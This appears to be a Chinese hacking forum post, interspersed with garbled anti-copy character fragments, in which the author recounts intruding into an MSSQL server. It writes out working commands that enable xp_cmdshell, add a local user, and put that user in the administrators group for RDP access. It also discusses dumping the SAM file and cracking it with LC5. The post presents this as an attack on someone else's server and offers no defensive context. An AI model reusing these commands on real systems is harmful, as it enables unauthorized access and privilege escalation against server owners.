saitojie

& X; n- S  E- ]2 T0 B* Q+ A, `
  o; E: r! i: Q

& |1 N6 `! K  |- c" y0 G于是开始找开启语句，对mssql的玩的少，不是太熟悉！
2 b/ T' T) E& h后来二少给我了语句，便去继续日之* F% q3 Y4 v: ?3 T2 d3 W4 {
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  [; D% ]) A4 |# C: i/ Y1为开启，0则为关闭！; n( _$ {4 ~% X5 o) p( X. P2 N/ c
然后执行
( p: O/ J9 x, p% T$ ?0 nEXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add': a) L  c2 m8 I
即可
7 k$ y: p$ U" a* x1 h2 t回过头去看看，发现用户已经成功添加上了！
# ?' P6 K, p: M/ I! `) S

8 R. y1 r# g+ Q& G. f( {* p! n
我就不明白BKK了，这个地方，你都已经加上用户了，为什么不直接加入到管理组里面，连接服务器的3389呢，为什么还要去下他的SAM，还用LC5去爆力破解呢！~~~~不明白！~~~. v3 j) j8 G6 A
EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add'，难道是因为他的3389做了登陆用户的限制？